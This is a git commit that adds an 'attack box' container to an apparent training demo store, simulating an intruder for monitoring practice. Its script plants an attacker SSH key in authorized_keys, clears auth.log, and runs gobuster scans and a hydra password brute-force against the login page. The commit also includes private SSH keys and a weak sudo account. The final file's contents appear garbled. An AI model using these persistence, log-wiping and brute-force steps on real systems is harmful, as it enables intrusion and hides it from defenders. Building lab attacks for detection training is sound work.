Add attackbox to docker compose (#163)

stanleegoodspeed · burningion · web-flow · commit c8a27e824c5f · 2021-09-24T15:07:28.000-04:00
* Add initial attack box container

* add local docker compose

* switch to kali, add gobuster cmd

* add hydra cmd

* add hydra cmd

* add rsyslog

* point gobuster to frontend

* output auth.log to stdout

* add loops

* change loop struct

* update readme

* make log format accessible via volume

* fix mount path

* typo

* add intentionally leaked keys

* update readme

Co-authored-by: KP Kaiser &lt;kirk@zothcorp.com&gt;
diff --git a/attack-box/.dockerignore b/attack-box/.dockerignore
@@ -0,0 +1,2 @@
+Dockerfile*
+.dockerignore
diff --git a/attack-box/Dockerfile b/attack-box/Dockerfile
@@ -0,0 +1,41 @@
+FROM kalilinux/kali:latest
+RUN mkdir /app
+
+ADD https://github.com/OJ/gobuster/releases/download/v3.1.0/gobuster-linux-amd64.7z /app
+ADD https://github.com/vanhauser-thc/thc-hydra/archive/refs/tags/v9.2.zip /app
+
+# Install packages
+RUN export DEBIAN_FRONTEND=noninteractive && \
+    apt-get update && \
+    apt-get upgrade --yes && \
+    apt-get install --yes libssl-dev libssh-dev libidn11-dev libpcre3-dev \
+                 libgtk2.0-dev libmariadb-dev libpq-dev libsvn-dev \
+                 firebird-dev libmemcached-dev libgpg-error-dev \
+                 libgcrypt20-dev  openssh-client iputils-ping wordlists \
+                 build-essential libpq-dev p7zip unzip && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*
+
+# Create user and ssh dir
+RUN useradd -m user
+RUN mkdir -p /home/user/.ssh
+COPY keys/storedog-leaked-key /home/user/.ssh/id_rsa
+
+# Install gobuster and hydra
+WORKDIR /app
+RUN gzip -d /usr/share/wordlists/rockyou.txt.gz
+RUN 7zr e ./gobuster-linux-amd64.7z && chmod +x gobuster
+RUN unzip v9.2.zip && cd thc-hydra-9.2/ && ./configure && make && make install
+
+# Copy attack script and keys
+COPY . .
+
+# Update permissions so ssh keys can be accessed outside sudo user
+RUN chown -R user:user /home/user/.ssh
+RUN chmod +x attack.sh
+RUN chown -R user ./keys
+
+# Switch back to new user so we can SSH properly
+USER user
+
+CMD [ "./attack.sh"]
diff --git a/attack-box/README.md b/attack-box/README.md
@@ -0,0 +1,33 @@
+# Attack Box
+
+This is an attack container for simulating an adversary attempting to hack our online store.
+
+The attack script has 3 stages:
+1) Malicious SSH configuration
+2) Gobuster
+3) Hydra
+
+Stage 1 will begin as soon as the attack-box container starts and it will add a malicious SSH key to the `discounts` container.
+
+Stages 2 and 3 are optional and are invoked via the docker compose command. More info is below.
+
+## Deployment
+
+The attack-box is configurable via environment variables in the `docker compose` command. The available variables are as follows:
+- **ATTACK_GOBUSTER**: Set to `1` to run the Gobuster tool for crawling directories on the frontend container
+- **ATTACK_HYDRA**: Set to `1` to run the Hydra tool for brute force login against the frontend container
+- **ATTACK_GOBUSTER_INTERVAL**: Number of seconds between GOBUSTER invocations (if ommited, GOBUSTER will run once)
+- **ATTACK_HYDRA_INTERVAL**: Number of seconds between HYDRA invocations (if ommited, HYDRA will run once)
+
+Here's an example of what a `docker compose` command would look like if we wanted to run Gobuster every 500 seconds and Hydra every 900 seconds:
+
+```POSTGRES_USER=postgres POSTGRES_PASSWORD=postgres DD_API_KEY=[API KEY] ATTACK_GOBUSTER=1 ATTACK_GOBUSTER_INTERVAL=500 ATTACK_HYDRA=1 ATTACK_HYDRA_INTERVAL=900 docker compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml up```
+
+Note that we used `docker-compose-fixed-instrumented-attack.yml` as the target for docker compose. This is the only compose file where attack-box is used.
+
+## Local dev
+Run the following commands locally (assuming you have `docker compose` already installed)
+1. Build all containers: `docker compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml build`
+2. Start the app: `POSTGRES_USER=postgres POSTGRES_PASSWORD=postgres DD_API_KEY=[API KEY] ATTACK_GOBUSTER=1 ATTACK_GOBUSTER_INTERVAL=500 ATTACK_HYDRA=1 ATTACK_HYDRA_INTERVAL=900 docker compose -f deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml up`
+
+You should see a large influx of logs on the frontend container once Gobuster and Hydra start running. These should also be available in Datadog in the account tied to the provided API Key
diff --git a/attack-box/attack.sh b/attack-box/attack.sh
@@ -0,0 +1,53 @@
+#!/bin/bash
+echo "Starting attackbox..."
+
+echo "attempt to copy attacker key to discounts...."
+scp -o StrictHostKeyChecking=no ./keys/attacker-key.pub test@discounts:/home/test/.ssh
+
+echo "attempt to update authorized_keys to have attacker key..."
+ssh -o StrictHostKeyChecking=no test@discounts /bin/bash <<EOT
+cat /home/test/.ssh/attacker-key.pub >> /home/test/.ssh/authorized_keys
+exit
+EOT
+
+echo "attempt to clear log file and zero out unallocated disk space"
+ssh -o StrictHostKeyChecking=no -i ./keys/attacker-key test@discounts /bin/bash <<EOT
+echo "test" | sudo -S cp /dev/null /var/log/auth.log
+echo "test" | sudo -S dd if=/dev/zero of=tempfile bs=1000000 count=10
+exit
+EOT
+
+# Add extra sleep to give frontend time to spin up (docker compose dependency is not enough)
+sleep 15
+
+if [ "${ATTACK_GOBUSTER}" = 1 ];
+then
+  if [[ -z "${ATTACK_GOBUSTER_INTERVAL}" ]]
+    then
+      # run single invocation
+      ./gobuster dir -u http://frontend:3000 -w /usr/share/wordlists/rockyou.txt
+    else
+      # run in a loop
+      while true
+      do
+          ./gobuster dir -u http://frontend:3000 -w /usr/share/wordlists/rockyou.txt
+          sleep $ATTACK_GOBUSTER_INTERVAL
+      done &
+  fi
+fi
+
+if [ "${ATTACK_HYDRA}" = 1 ];
+then
+  if [[ -z "${ATTACK_HYDRA_INTERVAL}" ]]
+    then
+      hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s 3000 frontend http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+    else
+      while true
+      do
+          hydra -l admin@storedog.com -P /usr/share/wordlists/rockyou.txt -s 3000 frontend http-post-form "/login:utf8=%E2%9C%93&authenticity_token=BonCnTVpWzCfGtgqZ7TiwEcSH89jz30%2F01vkNuVsKyKcC8xCF2DqeHF%2Bc%2B4U2CNWeArygGNPX%2BDvONHHz7Dr6Q%3D%3D&spree_user%5Bemail%5D=admin%40storedog.com&spree_user%5Bpassword%5D=^PASS^&spree_user%5Bremember_me%5D=0&commit=Login:Invalid email or password."
+          sleep $ATTACK_HYDRA_INTERVAL
+      done
+  fi
+fi
+
+echo "done"
diff --git a/attack-box/keys/README.md b/attack-box/keys/README.md
@@ -0,0 +1,3 @@
+### Attention
+
+These keys are used for training purposes and were **intentionally** added to this repository. These keys are self-contained within the docker images used by `deploy/docker-compose-fixed-instrumented-attack.yml`. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.
diff --git a/attack-box/keys/attacker-key b/attack-box/keys/attacker-key
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/attack-box/keys/attacker-key.pub b/attack-box/keys/attacker-key.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDT/u93T4U6ALDVKIF5t5n8FZ8FgaJ/rww3Yf+HBkfHI7LcA9McomQOzv2T0665EWosmmluT+JpwEnXNoZpJg4sdJSF2PFqlgrZl9mbyhsoxl3wVTUvFZb5yyw2nZdSbRx3OtmzBnOkPr25+btpx1wN6Tlvw3Yoc3Ewx4GVX1dkg3xRtVj42d6oeYWY9D3Y6+KmUBPcns2stU4cUzJy4RLtsW6Kvbwg0A9iPO06fhFZxHtmvl58m/rUzomeyUYSvHeGJyBO1fX/IFDNH27mky2Vsoc8Y6HA3m3fqPcvIrRYXc8q4T63ho4wVlTlENyZhz8c4x631fPqvR1iPvRGuDiTf8rzYQh0eayeitepS8RFAts7Q8o+6EswA7u33l5mJoCp2bw1Pr5/TIPszB0tg1tFzmDuejD4EXYTINFwlkiUP9PEtPAtHJtQe1dI9mTK3wW8t6XO1nBODTSeK292a6chMNwn7Hi9N3KWooYyxZZYRZZKat7ISfH02rfeiT6pchE= colin.cole@COMP-C02CD0UULVDN
diff --git a/attack-box/keys/storedog-leaked-key b/attack-box/keys/storedog-leaked-key
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml b/deploy/docker-compose/docker-compose-fixed-instrumented-attack.yml
@@ -0,0 +1,111 @@
+version: '3'
+services:
+  agent:
+    image: "datadog/agent:7.29.0"
+    environment:
+      - DD_API_KEY
+      - DD_APM_ENABLED=true
+      - DD_LOGS_ENABLED=true
+      - DD_LOGS_CONFIG_CONTAINER_COLLECT_ALL=true
+      - DD_PROCESS_AGENT_ENABLED=true
+      - DD_DOCKER_LABELS_AS_TAGS={"my.custom.label.team":"team"}
+      - DD_TAGS='env:development'
+    ports:
+      - "8126:8126"
+    volumes:
+      - /var/run/docker.sock:/var/run/docker.sock:ro
+      - /proc/:/host/proc/:ro
+      - /sys/fs/cgroup/:/host/sys/fs/cgroup:ro
+    labels:
+      com.datadoghq.ad.logs: '[{"source": "agent", "service": "agent"}]'
+  discounts:
+    environment:
+      - FLASK_APP=discounts.py
+      - FLASK_DEBUG=1
+      - POSTGRES_PASSWORD
+      - POSTGRES_USER
+      - POSTGRES_HOST=db
+      - DD_SERVICE=discounts-service
+      - DD_AGENT_HOST=agent
+      - DD_LOGS_INJECTION=true
+      - DD_TRACE_ANALYTICS_ENABLED=true
+      - DD_PROFILING_ENABLED=true
+      - DD_VERSION=1.1
+    build:
+      context: ../../discounts-service
+    ports:
+      - "5001:5001"
+      - "22"
+    depends_on:
+      - agent
+      - db
+    labels:
+      com.datadoghq.ad.logs: '[{"source": "python", "service": "discounts-service"}]'
+      my.custom.label.team: "discount"
+  frontend:
+    environment:
+      - DD_AGENT_HOST=agent
+      - DD_LOGS_INJECTION=true
+      - DD_TRACE_ANALYTICS_ENABLED=true
+      - DD_SERVICE=store-frontend
+      - DB_USERNAME
+      - DB_PASSWORD
+      - DD_VERSION=1.1
+      - DD_CLIENT_TOKEN
+      - DD_APPLICATION_ID
+    image: "ddtraining/storefront-fixed:latest"
+    volumes:
+      - "../../store-frontend/src/store-frontend-instrumented-fixed:/app"
+    command: sh docker-entrypoint.sh
+    ports:
+      - "3000:3000"
+    depends_on:
+      - agent
+      - db
+      - discounts
+      - advertisements
+    labels:
+      com.datadoghq.ad.logs: '[{"source": "ruby", "service": "store-frontend"}]'
+      my.custom.label.team: "frontend"
+  advertisements:
+    environment:
+      - FLASK_APP=ads.py
+      - FLASK_DEBUG=1
+      - POSTGRES_PASSWORD
+      - POSTGRES_USER
+      - POSTGRES_HOST=db
+      - DD_SERVICE=advertisements-service
+      - DD_AGENT_HOST=agent
+      - DD_LOGS_INJECTION=true
+      - DD_TRACE_ANALYTICS_ENABLED=true
+      - DD_PROFILING_ENABLED=true
+      - DD_VERSION=1.0
+    image: "ddtraining/advertisements-fixed:latest"
+    command: ddtrace-run flask run --port=5002 --host=0.0.0.0
+    ports:
+      - "5002:5002"
+    depends_on:
+      - agent
+      - db
+    labels:
+      com.datadoghq.ad.logs: '[{"source": "python", "service": "ads-service"}]'
+      my.custom.label.team: "advertisements"
+  db:
+    image: postgres:11-alpine
+    restart: always
+    environment:
+      - POSTGRES_PASSWORD
+      - POSTGRES_USER
+    labels:
+      com.datadoghq.ad.logs: '[{"source": "postgresql", "service": "postgres"}]'
+  attackbox:
+    build:
+      context: ../../attack-box
+    environment:
+      - ATTACK_GOBUSTER
+      - ATTACK_HYDRA
+      - ATTACK_GOBUSTER_INTERVAL
+      - ATTACK_HYDRA_INTERVAL
+    depends_on:
+      - discounts
+      - frontend
diff --git a/discounts-service/Dockerfile b/discounts-service/Dockerfile
@@ -8,24 +8,36 @@ FROM python:3.9.6-slim-buster
 RUN export DEBIAN_FRONTEND=noninteractive && \
     apt-get update && \
     apt-get upgrade --yes && \
-    apt-get install --yes build-essential libpq-dev && \
+    apt-get install --yes build-essential libpq-dev openssh-server sudo dumb-init rsyslog && \
     apt-get clean && \
     rm -rf /var/lib/apt/lists/*
 
+# Setup for attack scenario
+RUN useradd -rm -g root -G sudo test 
+RUN  echo 'test:test' | chpasswd
+USER test
+
 # Bring in app
 WORKDIR /app
 COPY . .
 
-# Install dependencies via pip and avoid caching build artifacts
-RUN pip install --no-cache-dir -r requirements.txt
+# Create SSH config for attack scenario
+RUN mkdir -p /home/test/.ssh
+COPY keys/storedog-leaked-key.pub /home/test/.ssh
+RUN touch /home/test/.ssh/authorized_keys
+RUN cat /home/test/.ssh/storedog-leaked-key.pub >> /home/test/.ssh/authorized_keys
 
+USER root
 # Let Flask know what to boot
 ENV FLASK_APP=discounts.py
 ENV DD_ENV=development
 
-# Listen on 5001
-EXPOSE 5001
+# Install dependencies via pip and avoid caching build artifacts
+RUN pip install --no-cache-dir -r requirements.txt
+RUN chmod +x ./my-wrapper-script.sh
+
+# required to get logs out of the container
+ENTRYPOINT ["/usr/bin/dumb-init", "--"]
 
-# Start the app using ddtrace so we have profiling and tracing
-ENTRYPOINT ["ddtrace-run"]
-CMD ["flask", "run", "--port=5001", "--host=0.0.0.0"]
+# runs sshd and flask server
+CMD ["./my-wrapper-script.sh"]
diff --git a/discounts-service/keys/README.md b/discounts-service/keys/README.md
@@ -0,0 +1,3 @@
+### Attention
+
+These keys are used for training purposes and were **intentionally** added to this repository. These keys are self-contained within the docker images used by `deploy/docker-compose-fixed-instrumented-attack.yml`. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.
diff --git a/discounts-service/keys/storedog-leaked-key.pub b/discounts-service/keys/storedog-leaked-key.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDUXq470vMlwLcCrG7BvwpE7eJQSY6dFpRMS7wHhIBECkD2w/ej2oXLA7lj5Go+A4oWEjXytNwBE7NwdMKGM5yHfaWp8zg7sqeDmx8ODrlW4shDPFBzqxP3XLZ7svYjcFqKDNpsKH74a+uk0wRGuVMWzjmednSAokGsPz84lmnHhuwKRaeVL99MteBeBD23youq9nrI7XmCZZ1wGsuN8yEUBOp3vl8dlD3PBXYCYguFIdnVufvQ0WuzKeayK/dbbi9moxVAHG7pRF7V8MMKyP2ySVV9/FcFNLTETCJLl7RKQCFhyMcUZ03Ehx3j4is7VCceMzJz49Mey2vgIR7YsQSLEiTSdCvGvnYyWZqYkTSSA4ObRV0ifSzyVcfouzP8QvD4YWHDSRjac4lI++Jo+/HdGnHQ6YA0cMlu7Px6Mje65TMcFq8EiwIk552fEem4sLG65h6OKAqQIt+qnBnN2tmKMxe/bqHOECzasyVREkiWCxqzUNt14dUmhqve/K4dXLk= colin.cole@COMP-C02CD0UULVDN
diff --git a/discounts-service/my-wrapper-script.sh b/discounts-service/my-wrapper-script.sh

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+### Attention`
	`2`	`+`
	`3`	+These keys are used for training purposes and were intentionally added to this repository. These keys are self-contained within the docker images used by `deploy/docker-compose-fixed-instrumented-attack.yml`. They do not reside in any other external server. Please do not flag for security purposes and/or a bug bounty program.
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDT/u93T4U6ALDVKIF5t5n8FZ8FgaJ/rww3Yf+HBkfHI7LcA9McomQOzv2T0665EWosmmluT+JpwEnXNoZpJg4sdJSF2PFqlgrZl9mbyhsoxl3wVTUvFZb5yyw2nZdSbRx3OtmzBnOkPr25+btpx1wN6Tlvw3Yoc3Ewx4GVX1dkg3xRtVj42d6oeYWY9D3Y6+KmUBPcns2stU4cUzJy4RLtsW6Kvbwg0A9iPO06fhFZxHtmvl58m/rUzomeyUYSvHeGJyBO1fX/IFDNH27mky2Vsoc8Y6HA3m3fqPcvIrRYXc8q4T63ho4wVlTlENyZhz8c4x631fPqvR1iPvRGuDiTf8rzYQh0eayeitepS8RFAts7Q8o+6EswA7u33l5mJoCp2bw1Pr5/TIPszB0tg1tFzmDuejD4EXYTINFwlkiUP9PEtPAtHJtQe1dI9mTK3wW8t6XO1nBODTSeK292a6chMNwn7Hi9N3KWooYyxZZYRZZKat7ISfH02rfeiT6pchE= colin.cole@COMP-C02CD0UULVDN